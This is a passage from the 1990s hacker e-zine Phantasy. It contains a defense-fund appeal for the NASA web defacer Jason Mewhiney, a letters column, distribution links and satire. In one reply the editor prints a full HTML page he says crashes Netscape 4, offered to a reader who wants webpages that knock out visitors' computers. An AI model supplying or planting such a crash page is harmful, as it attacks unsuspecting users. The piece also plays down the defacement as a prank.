-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [9]: FREE the FISH
              By: Mercenary <iirg@iirg.org>
                  with assistance from BoW 
                  http://www.bow.org/trout/

.a@&$$$ .a@&$&@a.   .a&$$$$ .a&$$$$      .a@&$$$ .a$$$a. .a@&$$$ a$$  $$a
 $$$$$$$ $$$'  `$$$  $$$$$$$ $$$$$$$      $$$$$$$ $$$$$$$ $$$$$$$ $$$  $$$
 $$$     $$$. .a&$'  $$$'    $$$'         $$$     `$$$$$' $$$$.   $$$  $$$
 $$$$$$  $$$$$$$'    $$$$$a  $$$$$a  THE  $$$$$$  .aaaaa. `$$$$a. $$$$$$$$
 $$$     $$$ `$$a.   $$$.    $$$.         $$$     $$$$$$$   `$$$$ $$$  $$$
 $$$     $$$  `$$$a. $$$$$$$ $$$$$$$      $$$     $$$$$$$ $$$$$$$ $$$  $$$
 $$$     $$$   `$$$' `$$$$$$ `$$$$$$      $$$     `$$$$$' "$$$$$" $$$  $$$

 I guess that for 2600 Magazine to offer you any support, you must have to 
have a book written about you or be a high profile media grabbing celebrity.
 Yet when Jason Mewhiney (AKA - Tr0ut) defaced NASA's main page on March 
5th 1997 and offered support to 2600 Magazine's two poster boys (Kevin Mitnick 
and Ed Cummings - AKA Bernie S), wouldn't you think that Eric Corley (AKA - 
Emmanuel Goldstein) might offer just a little support or media exposure to 
Jason?
 Well this support hasn't surfaced yet. Please read the following 
information and offer Jason the support that 2600 Magazine hasn't.

-----------------------------------------------------------------------------

About Jason Mewhiney's Case

NASA V. JASON MEWHINEY

I. Proceedings to Date

Jason originally faced fifty one charges and a $70,000 fine for his alleged 
involvement in the defacement of NASA's main page on March 5, 1997. This is 
however simply the culmination of years of harassment that Jason has faced 
from both the American and Canadian authorities.

A. Jason's current situation

Jason is currently serving a six-month prison sentence in Canada after 
entering into a plea agreement that reduced his charges. In sentencing him, 
Justice John Poupore said, "You sir, are a convicted criminal. That is a 
distinction you will carry with you for the rest of your life. It is nothing 
to be proud of." This is true -- there will be no badge of pride on Jason's 
sleeve when he leaves prison. When he does, it will be as a convicted 
computer-criminal, potentially facing similar restrictions to those faced 
by Kevin Mitnick upon his release. Jason began his sentence in a medium - 
maximum security prison in Sudbury, Ontario. Everyone in the prison was about
twice his age. Most of them hard-core criminals, including several convicted 
murderers serving 2 back to back life sentences.
About 2 weeks ago he was transferred to a facility in Timmins, ON, which 
according to Jason, is at least 10 times worse than the first prison. Jason 
has been forced to endure countless hardships in the short time he has been 
incarcerated. Despite the comparatively benign nature of his crimes, he is 
placed in the same environment as murderers and rapists. He is only allowed 1 
visit per week at 15 minutes per visit. His family has tried to bring him 
reading material -- harmless magazines like People -- but the prison has 
disallowed it. 
In a recent incident, Jason went to brush his teeth after finishing his work 
as a cleaner at the prison. He saw another inmate cleaner come out of one of 
the bathrooms. Assuming the bathroom was free, he went in and 
brushed his teeth. A guard then came and said the bathroom was for guards 
only. He was written up for it, and given a reprimand for "misconduct". 
Three days were tacked onto his sentence as a result. This incident will 
likely jeopardize his parole -- which he may be up for soon -- but worst of 
all, they threw him in the "hole". Which according to Jason himself, isn't a 
bad enough description of the place. Solitary confinement in this prison 
consists of an unlit 11 x 6 room with no mattress, bed, or window. Other 
prisoners sneak drugs in by "sticking them in their ass and shitting onto 
magazines to get them out." Even the notorious Canadian serial-killer Karla 
Homolka is not forced to live in such a Dickensian environment. 

Update: You can write to Jason Mewhiney in Prison. 

Send any correspondence to:

Jason Mewhiney
Box 90
Monteith Ontario
P0K 1P0
CANADA

B. Sentencing

Jason was sentenced to six months in jail after pleading guilty to twelve of 
the fifty one charges against him. After his prison sentence, it is likely 
that he may serve time under "house arrest". While under house arrest, 
Jason will effectively be banned from any and all computer use. This leaves 
Jason without his one marketable skill and will create massive problems for 
him when he is released. In addition to the prison-term and the possible 
restrictions upon his release, Jason has also been ordered to pay a $6000 
fine. Six thousand dollars is far short of the original seventy-thousand that
was being sought by NASA, yet it will still remain as a considerable 
financial burden to someone who will be left effectively unemployable after 
his release. 

II. Analysis of the case

The original charges that Jason faced were completely blown out of all 
proportions. NASA claimed that to copy the backup of their index page back 
and reinstall and secure the machine cost them an estimated $70,000. Anyone 
with any experience of computers and computer security can see that this is 
a grossly inflated figure. You can read NASA's statement on the whole 
incident at http://www.hq.nasa.gov/office/oig/hq/press/pr99025.txt
During the course of Jason's trial and conviction, thousands of dollars of 
taxpayer money were wasted on frivolous and unnecessary actions sanctioned by
both the FBI and the RCMP. The RCMP agents and Canadian authorities involved 
in the case were all flown down to NASA headquarters for what essentially 
added up to a free tour. American authorities and NASA officials were 
flown up to Canada on several occasions simply to attend the occasional short
bail-hearing or pre-trial motion. Everyone was flown up to Canada again for 
the sentencing hearing, despite their presence not being required. Who ends 
up paying for all of this air-travel and accommodation? The Canadian taxpayer,
in the end. Unfortunately, this never came to light during any of the 
reporting on Jason's case. Even though Jason eventually plea bargained and 
managed to avoid the huge fine and long jail term that he was threatened with,
we still have to ask ourselves whether someone should be imprisoned for what 
was essentially no more than a prank. Can we continue to allow corporations 
and government agencies to arbitrarily pick numbers out of the air when 
accounting for "damages" that occurred as a result of a mere web-page 
defacement? 

The Trout Defense Fund 

.a@&$$$ .a@&$&@a.   .a&$$$$ .a&$$$$      .a@&$$$ .a$$$a. .a@&$$$ a$$  $$a
 $$$$$$$ $$$'  `$$$  $$$$$$$ $$$$$$$      $$$$$$$ $$$$$$$ $$$$$$$ $$$  $$$
 $$$     $$$. .a&$'  $$$'    $$$'         $$$     `$$$$$' $$$$.   $$$  $$$
 $$$$$$  $$$$$$$'    $$$$$a  $$$$$a  THE  $$$$$$  .aaaaa. `$$$$a. $$$$$$$$
 $$$     $$$ `$$a.   $$$.    $$$.         $$$     $$$$$$$   `$$$$ $$$  $$$
 $$$     $$$  `$$$a. $$$$$$$ $$$$$$$      $$$     $$$$$$$ $$$$$$$ $$$  $$$
 $$$     $$$   `$$$' `$$$$$$ `$$$$$$      $$$     `$$$$$' "$$$$$" $$$  $$$

Defense Fund 

Jason Mewhiney has been financially ruined by the events surrounding his 
trial and incarceration. Jason's mother is bearing the brunt of the burden, 
facing thousands of dollars in Lawyer fees while Jason sits in prison. In 
addition to the debt incurred by the trial, Jason will have to deal with the
six-thousand dollar fine he has been ordered to pay to NASA. Without any 
means of income, and more than likely no chance of gainful employment, this 
case is likely to haunt him financially for years to come.
A Defense fund has been set up to help ease the burden placed on Jason and 
his family. If you care to donate, please send either a check or money order to:

The Trout Defense Fund
2527 Farmcrest Dr. #404 
Herndon, VA 20171
USA

Any amount is greatly appreciated. We are currently working on setting up a 
dedicated account for the fund so that money can be directly transferred. Any 
moneys received will go directly to help cover Jason's legal bills. If you 
can't afford to donate, then why not take the time to write Jason a letter or
send him some reading material? Anything sent to the defense fund will be 
forwarded to either Jason or his mother directly. 

Thank you for your support.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [10]: Letters to the IIRG
               (Fan Mail, Hate Mail, Letter Bombs)
               <iirg@iirg.org>

 I receive so many letters and requests that it would be impossible to
post all letters received. However, every now and then I get one that
makes me laugh or vomit uncontrollably. I offer these to you.....

------------------------------------------------------------------------------
1.  I have a question about Phantasy Magazine...

From: Pegasi17@aol.com
Delivered-To: iirg@iirg.org
Date: Sat, 10 Jul 1999 03:59:06 EDT
Subject: I have a question about Phantasy Magazine...
To: iirg@iirg.org

Is Phantasy Magazine going to be continued or was the issue 22 the last issue 
that will be made?  Thank you much...

     ---- Pegasi17


IIRG - Well the last issue was #23, and No... We are publishing again.

------------------------------------------------------------------------------- 
2. Inquiry?

Delivered-To: iirg@iirg.org
Date: Sun, 25 Jul 1999 23:16:36 -0700
From: Erik Bos <Genevaroth@yahoo.com>
To: iirg@iirg.org
Subject: inquiry

I am looking for schematics for the following: 


ELF generator microwave weapon

if in any back issues there is anything like this pls. email me with
ordering info.


Thank you

Erik Bos

IIRG - Sorry, but the technology to Microwave Elves has been patented
       and kept strictly confidential by the Keebler Corporation.
       Might I suggest you try a toaster oven instead?


-------------------------------------------------------------------------------
3. Are You for Hire?

From: "Marie Estes" <sophistry7@hotmail.com>
To: iirg@iirg.org
Date: Sun, 24 Oct 1999 21:23:43 GMT

I'm enjoying your prose on your website.
I, however, am not one of your kind.  I admire your exploits and ambition.  
I require your services and do not have the knowledge or expertise, nor 
temporal resources to do the job myself.  Perhaps you might consider an 
innocuous mercenary act?
You ARE for hire, aren't you?
RSVP.

IIRG - What did you have in mind Marie? And does it involve chocolate
      syrup and whip cream?

-------------------------------------------------------------------------------
4. Info?

From: "DK" <ww7@locl.net>
To: <iirg@iirg.org>
Subject: info
Date: Sat, 25 Dec 1999 17:57:34 -0500

Hi
    I am looking for the code that will allow a webpage to reboot the 
viewer computer.  Do you have or know any info that will help me find this 
coding?

syburcat    

IIRG - Try putting this on your page to Crash Netscape 4

=============================
<html>
<head>
<title>Smash Netscape</title>

<body bgcolor="#000000" text="#ffffff">

<br>
<font face="Arial, Helvetica, Geneva">
<center>
<font size="5" color="#777777"><b>Smash Netscape</b></font><br>
<br>
This page will crash Netscape Communicator 4!
</center>
</font>

<div id="smashItDiv" style="position: absolute; left: 160px; top: 175px; 
width: 264px; high: 150px; z-index: 50; visibility: visible;">
<table border="0" cellspacing="0" cellpadding="0" width="264">
<tr>
<td align="center" valign="middle">

<form name="smashItForm">

<img name="NSCrashImg" src="X.gif" border="0">

<br>
<font face="Arial, Helvetica" size="2">Crash Netscape</font><br>
<input name="askjdfh" type="input" size="20" maxlength="100"><br>
</font>

</form>
</td>
</tr>
</table>
</div>
<br>
</body>
</html>
==================================
-----------------------------------------------------------------------------
5. You Evil Hacker Survivalists You!!!

Date: Thu, 02 Mar 2000 22:36:13 -0600
From: Richard Reed <sanders4@knightsnet.com>
To: ticom@iirg.org

Hi yes I think this page is a threat to our country  therefore I have
forwarded a copy of this page and a link to various  government agencies.
http://www.iirg.org/~ticom/survival.html

TICOM - The only thing the Connecticut Survivalist Alliance Page is a 
        threat to are totalitarians, socialists, close-minded idiots, and 
        other such scum who despise the Bill of Rights. Since you are 
        apparently one of those types you have my permission to go frolic 
        in conjunction with yourself.
        My guess is that you are a terrorist, child molester, rapist, or 
        serial killer who does not wish his potential victims armed with 
        knowledge that they may use to defend themselves and maintain their 
        self-reliance and determination. 
        If not, then you are simply an idiot.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [12]: Phantasy Distribution Site

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Phantasy Distribution Sites

 Phantasy's Distribution Sites are continually changing; we apologize if you
 visit a site and it's not there. But always go to our main site and it will
 be there.

 1. The IIRG's Main Phantasy Distro Site

   http://www.iirg.org/phantasy.html

2. L0pht's Phantasy Magazine Archive

   http://www.l0pht.com/%7Eoblivion/IIRG.html

3. EFF "Phantasy" Archive

   http://www.eff.org/pub/Publications/CuD/Phantasy/index.html

If you'd like to set-up a Phantasy Distro site and be listed here and
 on the IIRG's link page, e-mail Mercenary at iirg@iirg.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [13] Articles We Never Want to See
              This Month - @MISTAKE PC Busters
   
 Forget about those nasty viruses and malicious hackers; the real threat 
to your PC is far more insidious. Your home computer may be host to a 
demon from Hell. You and your family may well come under its malevolent 
control.

"While the Computer Age has ushered in many advances, it has also opened yet 
another door through which Lucifer and his minions can enter and corrupt 
men's souls," says Reverend Jim Peasboro, author of the upcoming book, 
The Devil in the Machine. 

That's why the trained "White Hat Hackers" at the IIRG's 
@MISTAKE Corporation are coming to your aid. The IIRG's world renowned
staff of trained demon killing Mercenaries will rid your PC of the nastiest
spawns of Satan.

Listen to these testimonials:


"My wife who had never expressed an impure thought in her life was entering 
Internet chat rooms and found herself spewing foul, debasing language that
she would never use normally. The IIRG came in with battle axes and completely
destroyed her system. It was the best display of Information Warfare that
I have ever seen."
                            Winn Schwartau


"My programs began talking directly to me, openly mocking me.
It typed out, 'John, you are a liar and your book sucks.' 
Then the printer went haywire and started printing out what looked like 
gobbledygook. I later had a college professor examine the text.
He told me it was an ancient language and to contact the IIRG.
It finally turned out to be a stream of obscenities written in a 
2,800-year-old Mesopotamian dialect! Thank god the IIRG knows how to 
translate ancient Mesopotamian."

                             John Markoff

The Reverend advises anyone suspecting that their computer is possessed to 
consult a clergyman, or, if that fails - contact the IIRG and the @MISTAKE
Corporation.

Their skilled Technicians can replace your hard drive and reinstall your
software, getting rid of the wicked spirit permanently and installing
numerous monitoring and backdoor programs on your system.
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                     PHANTASY(C) IIRG 1991 - 2000
                        May Odin Guide Your Way!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
       May You Be Feasting and Drinking in Valhalla For a Full Night
              Before the Christian God Knows You're Dead
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-